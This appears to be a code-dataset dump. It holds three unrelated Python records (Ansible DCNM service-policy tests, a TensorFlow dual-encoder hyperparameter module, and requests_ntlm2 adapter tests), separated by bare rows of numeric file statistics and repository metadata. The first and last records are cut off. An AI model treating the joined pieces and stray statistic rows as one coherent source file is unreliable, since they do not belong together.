self.playbook_config = self.config_data.get('delete_policies_with_name_and_node_name')
set_module_args(dict(state='deleted',
attach=True,
deploy=True,
fabric='mmudigon',
service_fabric='external',
config=self.playbook_config))
result = self.execute_module(changed=True, failed=False)
self.assertEqual(len(result["diff"][0]["merged"]) , 0)
self.assertEqual(len(result["diff"][0]["deleted"]) , 3)
self.assertEqual(len(result["diff"][0]["modified"]) , 0)
self.assertEqual(len(result["diff"][0]["query"]) , 0)
self.assertEqual(len(result["diff"][0]["deploy"]) , 0)
# Validate create and deploy responses
for resp in result["response"]:
self.assertEqual(resp["RETURN_CODE"], 200)
def test_dcnm_sp_delete_existing_and_non_existing (self):
# load the json from playbooks
self.config_data = loadPlaybookData('dcnm_service_policy_configs')
self.payloads_data = loadPlaybookData('dcnm_service_policy_payloads')
# load required config data
self.playbook_config = self.config_data.get('delete_policies_with_name_and_node_name')
set_module_args(dict(state='deleted',
attach=True,
deploy=True,
fabric='mmudigon',
service_fabric='external',
config=self.playbook_config))
result = self.execute_module(changed=True, failed=False)
self.assertEqual(len(result["diff"][0]["merged"]) , 0)
self.assertEqual(len(result["diff"][0]["deleted"]) , 2)
self.assertEqual(len(result["diff"][0]["modified"]) , 0)
self.assertEqual(len(result["diff"][0]["query"]) , 0)
self.assertEqual(len(result["diff"][0]["deploy"]) , 0)
# Validate create and deploy responses
for resp in result["response"]:
self.assertEqual(resp["RETURN_CODE"], 200)
def test_dcnm_sp_delete_non_existing (self):
# load the json from playbooks
self.config_data = loadPlaybookData('dcnm_service_policy_configs')
self.payloads_data = loadPlaybookData('dcnm_service_policy_payloads')
# load required config data
self.playbook_config = self.config_data.get('delete_policies_with_name_and_no_name')
set_module_args(dict(state='deleted',
attach=True,
deploy=True,
fabric='mmudigon',
service_fabric='external',
config=self.playbook_config))
result = self.execute_module(changed=False, failed=False)
self.assertEqual(len(result["diff"][0]["merged"]) , 0)
self.assertEqual(len(result["diff"][0]["deleted"]) , 0)
self.assertEqual(len(result["diff"][0]["modified"]) , 0)
self.assertEqual(len(result["diff"][0]["query"]) , 0)
self.assertEqual(len(result["diff"][0]["deploy"]) , 0)
# Validate create and deploy responses
for resp in result["response"]:
self.assertEqual(resp["RETURN_CODE"], 200)
def test_dcnm_sp_delete_no_mand_elems (self):
# load the json from playbooks
self.config_data = loadPlaybookData('dcnm_service_policy_configs')
self.payloads_data = loadPlaybookData('dcnm_service_policy_payloads')
# load required config data
self.playbook_config = self.config_data.get('delete_policies_no_mand_elems')
set_module_args(dict(state='deleted',
attach=True,
deploy=True,
fabric='mmudigon',
service_fabric='external',
config=self.playbook_config))
result = None
try:
result = self.execute_module(changed=True, failed=False)
except Exception as e:
self.assertEqual(('node_name : Required parameter not found' in (str(e))), True)
self.assertEqual (result, None)
def test_dcnm_sp_replace_sp1_to_sp3_non_existing (self):
# load the json from playbooks
self.config_data = loadPlaybookData('dcnm_service_policy_configs')
self.payloads_data = loadPlaybookData('dcnm_service_policy_payloads')
# load required config data
self.playbook_config = self.config_data.get('replace_sp1_sp3_config')
set_module_args(dict(state='replaced',
attach=True,
deploy=True,
fabric='mmudigon',
service_fabric='external',
config=self.playbook_config))
result = self.execute_module(changed=True, failed=False)
self.assertEqual(len(result["diff"][0]["merged"]) , 3)
self.assertEqual(len(result["diff"][0]["deleted"]) , 0)
self.assertEqual(len(result["diff"][0]["modified"]) , 0)
self.assertEqual(len(result["diff"][0]["query"]) , 0)
self.assertEqual(len(result["diff"][0]["deploy"]) , 3)
# Validate create and deploy responses
for resp in result["response"]:
self.assertEqual(resp["RETURN_CODE"], 200)
def test_dcnm_sp_replace_sp1_to_sp3_existing (self):
# load the json from playbooks
self.config_data = loadPlaybookData('dcnm_service_policy_configs')
self.payloads_data = loadPlaybookData('dcnm_service_policy_payloads')
# load required config data
self.playbook_config = self.config_data.get('replace_sp1_sp3_config')
set_module_args(dict(state='replaced',
attach=True,
deploy=True,
fabric='mmudigon',
service_fabric='external',
config=self.playbook_config))
result = self.execute_module(changed=True, failed=False)
self.assertEqual(len(result["diff"][0]["merged"]) , 0)
self.assertEqual(len(result["diff"][0]["deleted"]) , 0)
self.assertEqual(len(result["diff"][0]["modified"]) , 3)
self.assertEqual(len(result["diff"][0]["query"]) , 0)
self.assertEqual(len(result["diff"][0]["deploy"]) , 3)
# Validate create and deploy responses
for resp in result["response"]:
self.assertEqual(resp["RETURN_CODE"], 200)
def test_dcnm_sp_replace_sp1_to_sp3_existing_no_change (self):
pass
# load the json from playbooks
self.config_data = loadPlaybookData('dcnm_service_policy_configs')
self.payloads_data = loadPlaybookData('dcnm_service_policy_payloads')
# load required config data
self.playbook_config = self.config_data.get('create_sp1_sp3_config')
set_module_args(dict(state='replaced',
attach=True,
deploy=True,
fabric='mmudigon',
service_fabric='external',
config=self.playbook_config))
result = self.execute_module(changed=False, failed=False)
self.assertEqual(len(result["diff"][0]["merged"]) , 0)
self.assertEqual(len(result["diff"][0]["deleted"]) , 0)
self.assertEqual(len(result["diff"][0]["modified"]) , 0)
self.assertEqual(len(result["diff"][0]["query"]) , 0)
self.assertEqual(len(result["diff"][0]["deploy"]) , 0)
# Validate create and deploy responses
for resp in result["response"]:
self.assertEqual(resp["RETURN_CODE"], 200)
def test_dcnm_sp_override_with_new_peerings (self):
# load the json from playbooks
self.config_data = loadPlaybookData('dcnm_service_policy_configs')
self.payloads_data = loadPlaybookData('dcnm_service_policy_payloads')
# load required config data
self.playbook_config = self.config_data.get('override_policies_create_new')
set_module_args(dict(state='overridden',
attach=True,
deploy=True,
fabric='mmudigon',
service_fabric='external',
config=self.playbook_config))
result = self.execute_module(changed=True, failed=False)
self.assertEqual(len(result["diff"][0]["merged"]) , 1)
self.assertEqual(len(result["diff"][0]["deleted"]) , 2)
self.assertEqual(len(result["diff"][0]["modified"]) , 0)
self.assertEqual(len(result["diff"][0]["query"]) , 0)
self.assertEqual(len(result["diff"][0]["deploy"]) , 1)
# Validate create and deploy responses
for resp in result["response"]:
self.assertEqual(resp["RETURN_CODE"], 200)
def test_dcnm_sp_override_with_existing_peering (self):
# load the json from playbooks
self.config_data = loadPlaybookData('dcnm_service_policy_configs')
self.payloads_data = loadPlaybookData('dcnm_service_policy_payloads')
# load required config data
self.playbook_config = self.config_data.get('override_policies_no_change')
set_module_args(dict(state='overridden',
attach=True,
deploy=True,
fabric='mmudigon',
service_fabric='external',
config=self.playbook_config))
result = self.execute_module(changed=True, failed=False)
self.assertEqual(len(result["diff"][0]["merged"]) , 0)
self.assertEqual(len(result["diff"][0]["deleted"]) , 2)
self.assertEqual(len(result["diff"][0]["modified"]) , 0)
self.assertEqual(len(result["diff"][0]["query"]) , 0)
self.assertEqual(len(result["diff"][0]["deploy"]) , 0)
# Validate create and deploy responses
for resp in result["response"]:
self.assertEqual(resp["RETURN_CODE"], 200)
def test_dcnm_sp_override_with_existing_peering_updated (self):
# load the json from playbooks
self.config_data = loadPlaybookData('dcnm_service_policy_configs')
self.payloads_data = loadPlaybookData('dcnm_service_policy_payloads')
# load required config data
self.playbook_config = self.config_data.get('override_policies_modify_exist')
set_module_args(dict(state='overridden',
attach=True,
deploy=True,
fabric='mmudigon',
service_fabric='external',
config=self.playbook_config))
result = self.execute_module(changed=True, failed=False)
self.assertEqual(len(result["diff"][0]["merged"]) , 0)
self.assertEqual(len(result["diff"][0]["deleted"]) , 2)
self.assertEqual(len(result["diff"][0]["modified"]) , 1)
self.assertEqual(len(result["diff"][0]["query"]) , 0)
self.assertEqual(len(result["diff"][0]["deploy"]) , 1)
# Validate create and deploy responses
for resp in result["response"]:
self.assertEqual(resp["RETURN_CODE"], 200)
def test_dcnm_sp_override_with_no_config (self):
# load the json from playbooks
self.config_data = loadPlaybookData('dcnm_service_policy_configs')
self.payloads_data = loadPlaybookData('dcnm_service_policy_payloads')
# load required config data
self.playbook_config = self.config_data.get('override_policies_no_config')
set_module_args(dict(state='overridden',
attach=True,
deploy=True,
fabric='mmudigon',
service_fabric='external',
config=self.playbook_config))
result = self.execute_module(changed=True, failed=False)
self.assertEqual(len(result["diff"][0]["merged"]) , 0)
self.assertEqual(len(result["diff"][0]["deleted"]) , 3)
self.assertEqual(len(result["diff"][0]["modified"]) , 0)
self.assertEqual(len(result["diff"][0]["query"]) , 0)
self.assertEqual(len(result["diff"][0]["deploy"]) , 0)
# Validate create and deploy responses
for resp in result["response"]:
self.assertEqual(resp["RETURN_CODE"], 200)
def test_dcnm_sp_query_existing_with_node_and_policy (self):
# load the json from playbooks
self.config_data = loadPlaybookData('dcnm_service_policy_configs')
self.payloads_data = loadPlaybookData('dcnm_service_policy_payloads')
# load required config data
self.playbook_config = self.config_data.get('query_with_node_and_policy_name')
set_module_args(dict(state='query',
attach=True,
deploy=True,
fabric='mmudigon',
service_fabric='external',
config=self.playbook_config))
result = self.execute_module(changed=False, failed=False)
self.assertEqual(len(result["diff"][0]["merged"]) , 0)
self.assertEqual(len(result["diff"][0]["deleted"]) , 0)
self.assertEqual(len(result["diff"][0]["modified"]) , 0)
self.assertEqual(len(result["diff"][0]["query"]) , 3)
self.assertEqual(len(result["diff"][0]["deploy"]) , 0)
self.assertEqual(len(result["response"]) , 3)
def test_dcnm_sp_query_non_existing (self):
# load the json from playbooks
self.config_data = loadPlaybookData('dcnm_service_policy_configs')
self.payloads_data = loadPlaybookData('dcnm_service_policy_payloads')
# load required config data
self.playbook_config = self.config_data.get('query_non_existing')
set_module_args(dict(state='query',
attach=True,
deploy=True,
fabric='mmudigon',
service_fabric='external',
config=self.playbook_config))
result = self.execute_module(changed=False, failed=False)
self.assertEqual(len(result["diff"][0]["merged"]) , 0)
self.assertEqual(len(result["diff"][0]["deleted"]) , 0)
self.assertEqual(len(result["diff"][0]["modified"]) , 0)
self.assertEqual(len(result["diff"][0]["query"]) , 3)
self.assertEqual(len(result["diff"][0]["deploy"]) , 0)
self.assertEqual(len(result["response"]) , 0)
def test_dcnm_sp_query_with_service_node1 (self):
# load the json from playbooks
self.config_data = loadPlaybookData('dcnm_service_policy_configs')
self.payloads_data = loadPlaybookData('dcnm_service_policy_payloads')
# load required config data
self.playbook_config = self.config_data.get('query_with_node_name_sn1')
set_module_args(dict(state='query',
attach=True,
deploy=True,
fabric='mmudigon',
service_fabric='external',
config=self.playbook_config))
result = self.execute_module(changed=False, failed=False)
self.assertEqual(len(result["diff"][0]["merged"]) , 0)
self.assertEqual(len(result["diff"][0]["deleted"]) , 0)
self.assertEqual(len(result["diff"][0]["modified"]) , 0)
self.assertEqual(len(result["diff"][0]["query"]) , 1)
self.assertEqual(len(result["diff"][0]["deploy"]) , 0)
self.assertEqual(len(result["response"]) , 1)
def test_dcnm_sp_query_with_service_node2 (self):
    """Query service policies filtered by service node name.

    NOTE(review): this test loads the 'query_with_node_name_sn1' config —
    the same key used by test_dcnm_sp_query_with_service_node1 — even
    though the test name says node2. Possibly a copy-paste; confirm
    whether 'query_with_node_name_sn2' was intended (the expected
    response length here is 2 vs 1 in the node1 test).
    """
    # load the json from playbooks
    self.config_data = loadPlaybookData('dcnm_service_policy_configs')
    self.payloads_data = loadPlaybookData('dcnm_service_policy_payloads')
    # load required config data
    self.playbook_config = self.config_data.get('query_with_node_name_sn1')
    set_module_args(dict(state='query',
                         attach=True,
                         deploy=True,
                         fabric='mmudigon',
                         service_fabric='external',
                         config=self.playbook_config))
    result = self.execute_module(changed=False, failed=False)
    # Query state stages no config changes; only the query diff section
    # and the raw controller responses are populated.
    self.assertEqual(len(result["diff"][0]["merged"]) , 0)
    self.assertEqual(len(result["diff"][0]["deleted"]) , 0)
    self.assertEqual(len(result["diff"][0]["modified"]) , 0)
    self.assertEqual(len(result["diff"][0]["query"]) , 1)
    self.assertEqual(len(result["diff"][0]["deploy"]) , 0)
    self.assertEqual(len(result["response"]) , 2)
def test_dcnm_sp_query_no_mand_elems(self):
    """A query config missing the mandatory node_name must be rejected."""
    # Load playbook fixtures and the (deliberately incomplete) config.
    self.config_data = loadPlaybookData('dcnm_service_policy_configs')
    self.payloads_data = loadPlaybookData('dcnm_service_policy_payloads')
    self.playbook_config = self.config_data.get('query_no_mand_elems')

    set_module_args(
        dict(
            state='query',
            attach=True,
            deploy=True,
            fabric='mmudigon',
            service_fabric='external',
            config=self.playbook_config,
        )
    )

    result = None
    try:
        result = self.execute_module(changed=True, failed=False)
    except Exception as err:
        # Module validation must complain about the missing parameter.
        self.assertIn('node_name : Required parameter not found', str(err))
    # The module must have raised, leaving result untouched.
    self.assertIsNone(result)
| 50.105081
| 139
| 0.559033
| 9,478
| 86,782
| 4.731061
| 0.025955
| 0.079213
| 0.105618
| 0.111438
| 0.966303
| 0.96327
| 0.960148
| 0.955398
| 0.947347
| 0.940992
| 0
| 0.023679
| 0.346938
| 86,782
| 1,731
| 140
| 50.134027
| 0.76753
| 0.041068
| 0
| 0.85758
| 0
| 0
| 0.145847
| 0.056192
| 0
| 0
| 0
| 0
| 0.153139
| 1
| 0.029862
| false
| 0.003828
| 0.003828
| 0
| 0.035988
| 0.000766
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
df4532606e1a9ef2c21b36744633ef9d6ee06ca3
| 32,395
|
py
|
Python
|
dual_encoder/util/param_util.py
|
stevezheng23/dual_encoder_tf
|
953f3aea507f265ce21319d99fd3e9f9d4c06bec
|
[
"Apache-2.0"
] | 1
|
2019-03-20T03:25:45.000Z
|
2019-03-20T03:25:45.000Z
|
dual_encoder/util/param_util.py
|
stevezheng23/dual_encoder_tf
|
953f3aea507f265ce21319d99fd3e9f9d4c06bec
|
[
"Apache-2.0"
] | null | null | null |
dual_encoder/util/param_util.py
|
stevezheng23/dual_encoder_tf
|
953f3aea507f265ce21319d99fd3e9f9d4c06bec
|
[
"Apache-2.0"
] | 1
|
2021-09-30T17:07:24.000Z
|
2021-09-30T17:07:24.000Z
|
import argparse
import codecs
import json
import math
import os.path
import numpy as np
import tensorflow as tf
__all__ = ["create_default_hyperparams", "load_hyperparams",
"generate_search_lookup", "search_hyperparams", "create_hyperparams_file"]
# Supported encoder types and their "understanding"-section hyperparameters.
# Each entry is applied symmetrically to both sides of the dual encoder as
# model_understanding_{src,trg}_<key>; everything else is shared across
# config types (see _common_hyperparams).
_UNDERSTANDING_HYPERPARAMS = {
    "conv_enc": {
        "num_layer": 2,
        "num_conv": 2,
        "unit_dim": 128,
        "window_size": [5],
        "hidden_activation": "relu",
        "dropout": 0.1,
        "layer_dropout": 0.1,
        "trainable": True,
    },
    "seq_enc": {
        "num_layer": 2,
        "unit_dim": 128,
        "cell_type": "lstm",
        "hidden_activation": "tanh",
        "dropout": 0.1,
        "forget_bias": 1.0,
        "residual_connect": False,
        "trainable": True,
    },
    "att_enc": {
        "num_layer": 2,
        "num_head": 8,
        "unit_dim": 128,
        "hidden_activation": "relu",
        "dropout": 0.1,
        "attention_dropout": 0.0,
        "layer_dropout": 0.1,
        "trainable": True,
    },
}

def _common_hyperparams():
    """Return the default hyperparameters shared by every config type.

    Built fresh on each call so mutable values (the window-size and metric
    lists) are never shared between HParams instances.
    """
    return dict(
        # data
        data_train_dual_file="",
        data_train_dual_file_type="",
        data_eval_dual_file="",
        data_eval_dual_file_type="",
        data_src_embed_file="",
        data_src_embed_full_file="",
        data_src_word_max_length=300,
        data_src_word_vocab_file="",
        data_src_word_vocab_size=50000,
        data_src_word_vocab_threshold=0,
        data_src_word_unk="<unk>",
        data_src_word_pad="<pad>",
        data_src_char_max_length=16,
        data_src_char_vocab_file="",
        data_src_char_vocab_size=1000,
        data_src_char_vocab_threshold=50,
        data_src_char_unk="*",
        data_src_char_pad="#",
        data_trg_embed_file="",
        data_trg_embed_full_file="",
        data_trg_word_max_length=300,
        data_trg_word_vocab_file="",
        data_trg_word_vocab_size=50000,
        data_trg_word_vocab_threshold=0,
        data_trg_word_unk="<unk>",
        data_trg_word_pad="<pad>",
        data_trg_char_max_length=16,
        data_trg_char_vocab_file="",
        data_trg_char_vocab_size=1000,
        data_trg_char_vocab_threshold=50,
        data_trg_char_unk="*",
        data_trg_char_pad="#",
        data_share_vocab=False,
        data_external_index_enable=False,
        data_pipeline_mode="default",
        data_num_parallel=4,
        data_log_output_dir="",
        data_result_output_dir="",
        # train
        train_random_seed=100,
        train_enable_shuffle=True,
        train_shuffle_buffer_size=30000,
        train_batch_size=32,
        train_neg_num=15,
        train_eval_batch_size=100,
        train_eval_metric=["cp_auc@1", "precision@1"],
        train_eval_detail_type="full",
        train_num_epoch=3,
        train_model_export_type="embedding",
        train_model_version="",
        train_model_output_dir="",
        train_ckpt_output_dir="",
        train_summary_output_dir="",
        train_step_per_stat=10,
        train_step_per_ckpt=1000,
        train_step_per_eval=1000,
        train_clip_norm=5.0,
        train_enable_debugging=False,
        train_loss_type="neg_sampling",
        train_ema_enable=True,
        train_ema_decay_rate=0.999,
        train_ema_enable_debias=False,
        train_ema_enable_dynamic_decay=False,
        train_regularization_enable=False,
        train_regularization_type="l2",
        train_regularization_scale=3e-7,
        train_optimizer_type="adam",
        train_optimizer_learning_rate=0.001,
        train_optimizer_warmup_enable=False,
        train_optimizer_warmup_mode="exponential_warmup",
        train_optimizer_warmup_rate=0.01,
        train_optimizer_warmup_end_step=1000,
        train_optimizer_decay_enable=False,
        train_optimizer_decay_mode="exponential_decay",
        train_optimizer_decay_rate=0.95,
        train_optimizer_decay_step=1000,
        train_optimizer_decay_start_step=10000,
        train_optimizer_momentum_beta=0.9,
        train_optimizer_rmsprop_beta=0.999,
        train_optimizer_rmsprop_epsilon=1e-8,
        train_optimizer_adadelta_rho=0.95,
        train_optimizer_adadelta_epsilon=1e-8,
        train_optimizer_adagrad_init_accumulator=0.1,
        train_optimizer_adam_beta_1=0.9,
        train_optimizer_adam_beta_2=0.999,
        train_optimizer_adam_epsilon=1e-08,
        # model - representation
        model_scope="dual_encoder",
        model_representation_src_word_embed_dim=300,
        model_representation_src_word_dropout=0.1,
        model_representation_src_word_embed_pretrained=True,
        model_representation_src_word_feat_trainable=False,
        model_representation_src_word_feat_enable=True,
        model_representation_src_char_embed_dim=16,
        model_representation_src_char_unit_dim=100,
        model_representation_src_char_window_size=[3, 5],
        model_representation_src_char_hidden_activation="relu",
        model_representation_src_char_dropout=0.1,
        model_representation_src_char_pooling_type="max",
        model_representation_src_char_feat_trainable=True,
        model_representation_src_char_feat_enable=True,
        model_representation_src_fusion_type="highway",
        model_representation_src_fusion_num_layer=2,
        model_representation_src_fusion_unit_dim=128,
        model_representation_src_fusion_hidden_activation="relu",
        model_representation_src_fusion_dropout=0.2,
        model_representation_src_fusion_trainable=True,
        model_representation_trg_word_embed_dim=300,
        model_representation_trg_word_dropout=0.1,
        model_representation_trg_word_embed_pretrained=True,
        model_representation_trg_word_feat_trainable=False,
        model_representation_trg_word_feat_enable=True,
        model_representation_trg_char_embed_dim=16,
        model_representation_trg_char_unit_dim=100,
        model_representation_trg_char_window_size=[3, 5],
        model_representation_trg_char_hidden_activation="relu",
        model_representation_trg_char_dropout=0.1,
        model_representation_trg_char_pooling_type="max",
        model_representation_trg_char_feat_trainable=True,
        model_representation_trg_char_feat_enable=True,
        model_representation_trg_fusion_type="highway",
        model_representation_trg_fusion_num_layer=2,
        model_representation_trg_fusion_unit_dim=128,
        model_representation_trg_fusion_hidden_activation="relu",
        model_representation_trg_fusion_dropout=0.2,
        model_representation_trg_fusion_trainable=True,
        model_share_representation=False,
        model_share_understanding=False,
        # model - interaction
        model_interaction_src2trg_attention_dim=128,
        model_interaction_src2trg_score_type="trilinear",
        model_interaction_src2trg_dropout=0.0,
        model_interaction_src2trg_attention_dropout=0.0,
        model_interaction_src2trg_trainable=True,
        model_interaction_src2trg_enable=False,
        model_interaction_src_fusion_type="concate",
        model_interaction_src_fusion_num_layer=1,
        model_interaction_src_fusion_unit_dim=128,
        model_interaction_src_fusion_hidden_activation="relu",
        model_interaction_src_fusion_dropout=0.2,
        model_interaction_src_fusion_trainable=True,
        model_interaction_trg2src_attention_dim=128,
        model_interaction_trg2src_score_type="trilinear",
        model_interaction_trg2src_dropout=0.0,
        model_interaction_trg2src_attention_dropout=0.0,
        model_interaction_trg2src_trainable=True,
        model_interaction_trg2src_enable=False,
        model_interaction_trg_fusion_type="concate",
        model_interaction_trg_fusion_num_layer=1,
        model_interaction_trg_fusion_unit_dim=128,
        model_interaction_trg_fusion_hidden_activation="relu",
        model_interaction_trg_fusion_dropout=0.2,
        model_interaction_trg_fusion_trainable=True,
        model_share_interaction=False,
        # model - matching
        model_matching_score_type="cosine",
        model_matching_pooling_type="max",
        model_matching_num_layer=2,
        model_matching_unit_dim=128,
        model_matching_hidden_activation="relu",
        model_matching_dropout=0.2,
        model_matching_projection_dim=1,
        model_matching_trainable=True,
        # device
        device_num_gpus=1,
        device_default_gpu_id=0,
        device_log_device_placement=False,
        device_allow_soft_placement=False,
        device_allow_growth=False,
        device_per_process_gpu_memory_fraction=0.8,
    )

def create_default_hyperparams(config_type):
    """Create default hyperparameters for the given encoder type.

    The three supported config types ("conv_enc", "seq_enc", "att_enc")
    share all data/train/representation/interaction/matching/device
    hyperparameters and differ only in the "understanding" section, so the
    shared portion lives in _common_hyperparams() instead of being
    triplicated per config type.

    Args:
        config_type: one of "conv_enc", "seq_enc", "att_enc".
    Returns:
        tf.contrib.training.HParams holding the default values.
    Raises:
        ValueError: if config_type is not supported.
    """
    if config_type not in _UNDERSTANDING_HYPERPARAMS:
        raise ValueError("unsupported config type {0}".format(config_type))
    params = _common_hyperparams()
    params["model_type"] = config_type
    for side in ("src", "trg"):
        for key, value in _UNDERSTANDING_HYPERPARAMS[config_type].items():
            # copy list values so src/trg (and repeated calls) never alias
            params["model_understanding_{0}_{1}".format(side, key)] = (
                list(value) if isinstance(value, list) else value
            )
    return tf.contrib.training.HParams(**params)
def load_hyperparams(config_file):
    """Load hyperparameters from a JSON config file.

    Starts from the defaults for the file's "model_type" and overrides
    them with every value present in the file.

    Raises:
        FileNotFoundError: if config_file does not exist.
    """
    if not tf.gfile.Exists(config_file):
        raise FileNotFoundError("config file not found")
    with codecs.getreader("utf-8")(tf.gfile.GFile(config_file, "rb")) as config_reader:
        overrides = json.load(config_reader)
    hyperparams = create_default_hyperparams(overrides["model_type"])
    hyperparams.override_from_dict(overrides)
    return hyperparams
def generate_search_lookup(search,
                           search_lookup=None):
    """Sample a single hyperparameter value from a search description.

    Args:
        search: dict with "stype" (uniform / log / discrete / lookup),
            "dtype" (int / float / string / boolean / list), and the
            strategy-specific fields ("range", "set" or "key"); optional
            "scale" and "shift" are applied to int/float samples.
        search_lookup: optional table consulted by the "lookup" strategy.
    Returns:
        the sampled value, coerced to dtype.
    Raises:
        ValueError: on an unsupported stype/dtype or a missing lookup key.
    """
    lookup = search_lookup if search_lookup else {}
    stype = search["stype"]
    dtype = search["dtype"]

    if stype == "uniform":
        low, high = search["range"][0], search["range"][1]
        if dtype == "int":
            sample = np.random.randint(low, high)
        elif dtype == "float":
            sample = (high - low) * np.random.random_sample() + low
        else:
            raise ValueError("unsupported data type {0}".format(dtype))
    elif stype == "log":
        # sample uniformly in log10 space, then map back
        log_low = math.log(search["range"][0], 10)
        log_high = math.log(search["range"][1], 10)
        if dtype != "float":
            raise ValueError("unsupported data type {0}".format(dtype))
        sample = math.pow(10, (log_high - log_low) * np.random.random_sample() + log_low)
    elif stype == "discrete":
        choices = search["set"]
        sample = choices[np.random.choice(len(choices))]
    elif stype == "lookup":
        key = search["key"]
        if key not in lookup:
            raise ValueError("search key {0} doesn't exist in look-up table".format(key))
        sample = lookup[key]
    else:
        raise ValueError("unsupported search type {0}".format(stype))

    # scale/shift only affect numeric dtypes
    scale = search.get("scale", 1.0)
    shift = search.get("shift", 0.0)
    if dtype == "int":
        return int(scale * sample + shift)
    if dtype == "float":
        return float(scale * sample + shift)
    if dtype == "string":
        return str(sample)
    if dtype == "boolean":
        return bool(sample)
    if dtype == "list":
        return list(sample)
    raise ValueError("unsupported data type {0}".format(dtype))
def search_hyperparams(hyperparams,
                       config_file,
                       num_group,
                       random_seed):
    """Search hyperparameters based on a search config.

    For each of num_group samples, first samples the "variables" section,
    then samples the "hyperparams" section (which may reference the
    sampled variables via "lookup"), and overrides a copy of the base
    hyperparams with the result.

    Raises:
        FileNotFoundError: if config_file does not exist.
    """
    if not tf.gfile.Exists(config_file):
        raise FileNotFoundError("config file not found")
    with codecs.getreader("utf-8")(tf.gfile.GFile(config_file, "rb")) as config_reader:
        np.random.seed(random_seed)
        search_setting = json.load(config_reader)
        hyperparams_setting = search_setting["hyperparams"]
        variables_setting = search_setting["variables"]
        hyperparams_group = []
        for _ in range(num_group):
            # variables first: hyperparams may look them up
            variables_lookup = {
                key: generate_search_lookup(variables_setting[key])
                for key in variables_setting.keys()
            }
            sampled_overrides = {
                key: generate_search_lookup(hyperparams_setting[key], variables_lookup)
                for key in hyperparams_setting.keys()
            }
            hyperparams_sample = tf.contrib.training.HParams(hyperparams.to_proto())
            hyperparams_sample.override_from_dict(sampled_overrides)
            hyperparams_group.append(hyperparams_sample)
        return hyperparams_group
def create_hyperparams_file(hyperparams_group, config_dir):
    """Create one JSON config file per group of hyperparameters.

    Files are written as config_hyperparams_<i>.json under config_dir,
    which is created if it does not exist.

    Args:
        hyperparams_group: sequence of HParams-like objects (must expose
            .values() returning a JSON-serializable dict).
        config_dir: output directory.
    """
    if not tf.gfile.Exists(config_dir):
        tf.gfile.MakeDirs(config_dir)
    # enumerate instead of range(len(...)) — same order, idiomatic
    for index, hyperparams in enumerate(hyperparams_group):
        config_file = os.path.join(config_dir, "config_hyperparams_{0}.json".format(index))
        with codecs.getwriter("utf-8")(tf.gfile.GFile(config_file, "w")) as config_writer:
            config_writer.write(json.dumps(hyperparams.values(), indent=4))
| 47.56975
| 120
| 0.669517
| 3,752
| 32,395
| 5.212154
| 0.06903
| 0.110759
| 0.064124
| 0.03196
| 0.880804
| 0.862651
| 0.849253
| 0.847924
| 0.843117
| 0.830436
| 0
| 0.029896
| 0.263806
| 32,395
| 680
| 121
| 47.639706
| 0.790096
| 0.005093
| 0
| 0.837879
| 1
| 0
| 0.038592
| 0.003043
| 0
| 0
| 0
| 0
| 0
| 1
| 0.007576
| false
| 0
| 0.010606
| 0
| 0.024242
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
df93d8da8d891bd1f013cb87b3a0b95af24b419e
| 7,145
|
py
|
Python
|
tests/unit/test_adapters.py
|
jkugler/requests-ntlm2
|
d5cc3a39b228fb2f3d95275101cfbff17aeb8e07
|
[
"ISC"
] | null | null | null |
tests/unit/test_adapters.py
|
jkugler/requests-ntlm2
|
d5cc3a39b228fb2f3d95275101cfbff17aeb8e07
|
[
"ISC"
] | null | null | null |
tests/unit/test_adapters.py
|
jkugler/requests-ntlm2
|
d5cc3a39b228fb2f3d95275101cfbff17aeb8e07
|
[
"ISC"
] | null | null | null |
import unittest
import mock
import requests.adapters
import requests.sessions
from requests.packages.urllib3.connection import HTTPConnection, HTTPSConnection
import requests_ntlm2.adapters
import requests_ntlm2.connection
class TestHttpProxyAdapter(unittest.TestCase):
    """Unit tests for requests_ntlm2.adapters.HttpProxyAdapter."""

    def test_init(self):
        """The adapter is an HttpProxyAdapter and a requests HTTPAdapter."""
        proxy_adapter = requests_ntlm2.adapters.HttpProxyAdapter()
        self.assertIsInstance(proxy_adapter, requests_ntlm2.adapters.HttpProxyAdapter)
        self.assertIsInstance(proxy_adapter, requests.adapters.HTTPAdapter)

    def test__add_host_header(self):
        """A Host header is added for http URLs but not for https URLs."""
        proxy_adapter = requests_ntlm2.adapters.HttpProxyAdapter()

        http_request = requests.Request(url="http://github.com:80")
        self.assertIsNone(http_request.headers.get("Host"))
        proxy_adapter._add_host_header(http_request)
        self.assertIsNotNone(http_request.headers.get("Host"))
        self.assertEqual(http_request.headers["Host"], "github.com")

        https_request = requests.Request(url="https://github.com:443")
        self.assertIsNone(https_request.headers.get("Host"))
        proxy_adapter._add_host_header(https_request)
        self.assertIsNone(https_request.headers.get("Host"))

    def test__add_host_header__already_added(self):
        """A pre-set Host header is rewritten for http and removed for https."""
        proxy_adapter = requests_ntlm2.adapters.HttpProxyAdapter()

        # http on the default port: Host is rewritten without the port
        req = requests.Request(url="http://github.com:80")
        req.headers["Host"] = "github.com:123"
        proxy_adapter._add_host_header(req)
        self.assertEqual(req.headers.get("Host"), "github.com")

        # http on a non-default port: Host is rewritten keeping the port
        req = requests.Request(url="http://github.com:8080")
        req.headers["Host"] = "github.com:123"
        proxy_adapter._add_host_header(req)
        self.assertEqual(req.headers.get("Host"), "github.com:8080")

        # https with a mismatched Host: the header is dropped
        req = requests.Request(url="https://github.com:8080")
        req.headers["Host"] = "github.com:123"
        proxy_adapter._add_host_header(req)
        self.assertIsNone(req.headers.get("Host"))

        # https with a matching Host: the header survives
        req = requests.Request(url="https://github.com:8080")
        req.headers["Host"] = "github.com:8080"
        proxy_adapter._add_host_header(req)
        self.assertEqual(req.headers.get("Host"), "github.com:8080")

    def test__is_valid_host_header(self):
        """Host is valid only when it matches the request URL's host:port."""
        proxy_adapter = requests_ntlm2.adapters.HttpProxyAdapter()
        req = requests.Request()
        self.assertFalse(proxy_adapter._is_valid_host_header(req))
